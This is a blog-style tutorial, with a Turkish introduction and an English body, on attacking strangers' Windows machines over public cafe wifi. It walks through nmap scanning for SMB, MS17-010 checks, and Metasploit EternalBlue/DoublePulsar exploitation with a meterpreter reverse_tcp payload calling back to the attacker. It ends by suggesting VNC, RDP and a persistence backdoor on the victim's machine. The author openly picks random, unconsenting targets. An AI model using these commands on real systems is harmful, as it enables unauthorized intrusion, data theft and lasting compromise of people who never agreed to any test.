Merhaba Pentester arkadaşlarım, Bu derste size ağda pentest yapmayı, hedef seçmeyi ve onlara erişim sağlamayı göstereceğim. Buradaki senaryo, önce bir keşif veya bilgi toplama yapacağız, ardından zafiyet taraması yapacağız ve son olarak da exploit yapacağız. Eternalblue ve DoublePulsar kullanacağız, Bu exploit birlikte iş birliğidir, pencerelerde arka kapı olarak kullanılan “EternalBlue” ve dll payload dosyasını enjekte etmek için kullanılan “Doublepulsar”. Nmap ve Metasploit’i de kullanacağız. Hadi terminale atlayalım!
Reconnaisance > Vulnerability Scan > Exploit
Firstly, connect into wireless network, i used to connect into public wifi like cafe or public areas. Because it’s more fun of having random target right? I would not go into how could you get into that network, that would be so long tutorial btw. [inner backlink] I assume you have connected, now take a note to be identified later. Know your local IP !
My IP : 192.168.1.70
Gateway : 192.168.1.1
Netmask : 255.255.255.0(/24)
From here, now you know who you’re, where you’re, know your machine ID, and network infos.
Now start scanning and looking for target :). As usual we will using Nmap. By the way, i will resume to make it short, im interesting on EternalBlue and DoublePulsar exploit. Have your ever playing around with it? trust me its fun. And believe or not, that famous exploit still exists nowadays. Because what? Because the users is lol. Eternalblue and DoublePulsar is behind the wannacry ransomware, if you have windows machine then consider blocking all vulnerable ports of smbv1 services to prevent wannacry attack or EternalBlue and DoublePulsar Exploit. Abusing a vulnerability in Windows’ Server Message Block (SMB) on port 445, EternalBlue allowed the WannaCry ransomware to spread like a worm and hit over 200,000 machines within a few days only. Before WannaCry, however, a crypto-currency mining botnet dubbed Adylkuzz had been using the same exploit to compromise devices.
Run this command
nmap -v -p445 192.168.1.1/24 | grep open
Tadaaa, we got open port on 445. This port replaces the notorious Windows NetBIOS trio (ports 137-139), for all versions of Windows after NT, as the preferred port for carrying Windows file sharing and numerous other services.
Add to note:
Target IP : 192.168.1.66
Check the vuln, run this command :
nmap -v -p445 [Target IP] --script vuln
As you can see, this target is vulnerable to ms17_010.
Ok, next step, while firing up msfconsole, find that exploit located.
run this command :
Notice that there is two types of modules listed above, Auxiliary the scanner and Exploit. We will use the Auxiliary module and use different exploit module later. See this video to install EternalBlue DoublePulsar exploit modules.
Now switch to msfconsole window. First we use the scanner module to make sure the exploit run at least succeed ;).
Run this command:
use auxiliary/scanner/smb/smb_ms17_010 options set RHOSTS [target IP] run
Notice these output result:
[+] 192.168.1.66:445 – Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7600)
[!] 192.168.1.66:445 – Host is likely INFECTED with DoublePulsar! – Arch: x86 (32-bit), XOR Key: 0x36CE8729
The target machine is x86 / 32-bit.
Now its time to exploit !
run this commands :
use exploit/windows/smb/eternalblue_doublepulsar set payload windows/meterpreter/reverse_tcp set PROCESSINJECT spoolsv.exe set RHOST 192.168.1.66 set LHOST 192.168.1.70 exploit
Exploit Succeed ! now we got meterpreter sessions with authoritive privilage. From here you can control this machine. run VNC, set RDP, set persistence backdoor to auto connect back to us. etc. We have pwned his/r windows machine.